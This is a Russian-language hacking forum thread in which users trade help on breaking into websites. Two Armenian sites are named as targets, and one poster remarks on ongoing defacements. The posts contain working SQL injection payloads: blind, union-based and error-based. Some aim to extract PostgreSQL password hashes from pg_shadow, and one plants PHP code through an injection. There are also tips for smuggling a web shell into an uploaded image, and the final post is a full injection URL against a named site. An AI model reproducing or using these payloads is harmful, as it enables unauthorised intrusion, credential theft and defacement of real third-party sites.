Ваши вопросы по уязвимостям.

youthparliament.am
админку не моqу наыти..
если кто смоjэт помоqите поялуста..
/admin пробовал.

 

blind sql

Всем привет!
Кручу blind вида(в поле ввода мыла):

Code:

la@la.la' and (select if((select user from mysql.user limit 1)='root',1,0))='1

У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу.
Ну т.е. я хочу в таблицу с новостями добавить php-код.
Прокатит ли такое?

 

ну как на /admin нет прав, вот попробуй cPanel http://www.youthparliament.am/cpanel/

 

Что, залил такую картинку и шелл заработал? Круть, надо взять на вооружение

 

снова из Азербайджанa, и сново дефейс Армянских сайтов?

не одобряю...


---------

p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом..

 

Нет, я конечно понимаю, жара и всё такое, но ты разве k2b1~ ? Почему ты мне пишешь про какие-то логи апача? Что за хрень вы тут понаписали вообще на последних двух страницах?)

Один просит как залить шелл ВМЕСТО картинки из админки (обойти фильтр на разрешение и т.д.), ему советуют вставить в конец картинки код, тот главное потом пишет спасибо (зохавал видать все интырнеты уже новым способом), теперь ты со своими логами - у дурки день открытых дверей?))))

Или там было написано "у меня кроме админки еще есть LFI"???)))

 

вспомнил ?

 

2 Konqi:

Твоя тема аж на 1399 странице, посмотри номер этой, ты что, правда думаешь, так можно строить диалог? И с чего ты взял, что вот так вот просто можно через 3 страницы и два дня писать: "p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом.." и надеяться на то, что тебя поймут? Тем более ты же дальше пишешь уже про еще 10 ДРУГИХ сайтов - с логикой напряги?)))

главное "я там нашел" - ыыыыыыыыы

 

Pashkela понимаю =* sorry

а сейчас можно ответить? ))))

 

Здравствуйте уважаемые гуру и не только. Есть небольшая проблемка: есть иньекция postgresql 7.4 но иньекция в жопашном месте - select ххх from(select '123%INJ%' as code) as listcode left join то left join это и так далее с толпой сложных и малопонятных джойнов. Само собой простой комментарий -- все не комментирует, так что если поставить ; И написать свой запрос будет лишь ошибка.

Ошибки выводятся так что данные из бд получить проблем нет, темболее что пользователь суперюзер. Проблема в том что хочу в админку. А она сцука под паролем в htaccess. а без отдельного sql запроса файл, как я поглядел в мануалах, не прочитать.

Ну я подумал что не проблема - можно подключиться напрямую к серверу бд, ибо доступ к pg_shadow есть. Проблема в том что

Code:

array_to_string(array(select passwd::text from pg_shadow+where+usename=getpgusername()),','::text)

ругается нехорошими словами Query failed: ERROR: значения NULL как элементы массива не поддерживается. Эта ошибка ставит меня в тупик честно говоря - подумал ну мало-ли бывают пустые пароли. но блин какой запрос не составляй - хоть с array хоть без него подтвердить что в базе есть пользователи с не null паролями так и не смог. Странно короче.

Пы.Сы: таблиц с пользователями в различных бд этого сервака хренова туча все пароли админов не протестил но те что проверил к хтаксессу не подходят.

 

можно, если будет LFI в студию, откуда я знаю, что за логи апача ты там подключаешь и откуда ты берешь к ним пути и видно ли ошибки вообще и т.д.

 

к сожалению в студию не могу,отправлю в пм

 

вопрос такой:

есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id

index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*

скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?

 

Если ошибка выводится,крути как слепую с выводом в ошибку.

 

попробуй типа этого...
index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema.tables+limit+0,1/*
есле 5тая версия.. а не какайта там 3-тья иле четвертая..

и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал.
-> +AND+substring(version,1,1)=5

 

[Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.

durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого
index.php?id=37+and+if(5=4,NULL,NUll)+union+select+1,2/*
но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу
index.php?id=37+and+1=2+union+select+1,2/*

 

вопрос закрыт : отдельное спасибо Pashkel-y

 

Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
index.php?id=37+limit+0+union+select+1,2/*
Ну или так:
index.php?id=37+union+select+1,2+limit+1,1/*

 

вот поjaлсута помоqите раскрутить..
как то не получается

 

Code:

http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more